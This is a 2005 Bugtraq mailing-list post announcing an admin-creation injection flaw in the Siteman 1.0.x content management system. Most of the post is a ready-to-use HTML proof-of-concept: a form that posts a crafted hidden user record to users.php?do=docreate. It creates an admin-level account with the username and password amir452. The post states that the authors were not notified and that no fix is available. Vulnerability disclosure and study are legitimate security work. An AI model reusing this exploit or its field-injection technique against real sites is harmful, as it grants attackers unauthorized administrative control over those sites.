lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050120215633.22623.qmail@www.securityfocus.com>
Date: 20 Jan 2005 21:56:33 -0000
From: Pedram hayati <pi3ch@...oo.com>
To: bugtraq@...urityfocus.com
Subject: God Admin Injection Vulnerability in Siteman 1.0.x




God Admin Injection Vulnerability in Siteman 1.0.x,

Discovered by PersianHacker.NET Security Team
by amironline452 (amironline452 hotmail com)
http://www.PersianHacker.NET
http://www.amironline452.tk 

Siteman is a Content Management System (CMS) that is so easy to install and use, that
a person who has no knowledge about creating homepages can get a profesionally
looking website up and running in just minutes.

More info @ 
http://sitem.sourceforge.net/
http://sourceforge.net/projects/sitem/

Discussion:
With this Vulnerability you can create God Admin user in Siteman v1.0.x.

Exploiet:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0" 
cellpadding="2"><tr><td>Username(Use this, and not your display name, 
when 
logging in)</td><td 
align="right">amir452</td></tr><tr><td>Password</td><td 
align="right"><form><select><option>Click to show password</option>
					<option>amir452</option></select></form></td></tr><tr><td>Secret 
Question (Asked when you forget your password)</td><td 
align="right">amir452</td></tr><tr><td>Answer to secret 
question</td><td 
align="right"><form>
<select>
<option>Click to show answer</option>
<option>amir452</option>
</select></form>
</td></tr><tr><td>Display name</td><td 
align="right">amir452</td></tr><tr><td>Member Level</td><td 
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td 
align="right">amir452@...r452.com</td></tr><tr><td>Hide my email 
adress</td><td align="right">no</td></tr><tr><td>Forum 
Signature</td><td 
align="right">hackers</td></table><br /><br />Is this correct?<br 
/><table 
cellspacing="0" cellpadding="3"><tr><td>

<form action="users.php?do=new" method="post"><input type="submit" 
value="no" /></form></td><td>

<form action="http://www.example.com/users.php?do=docreate" 
method="post">
					<input type="hidden" name="line" 
value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@...r452.com|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" 
/><input type="submit" value="yes" /></form></html>

the above exploiet creat God Admin user with folowing info:
username: amir452
password: amir452

Note:
Script authors  not contacted.
There is no solution at this time.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ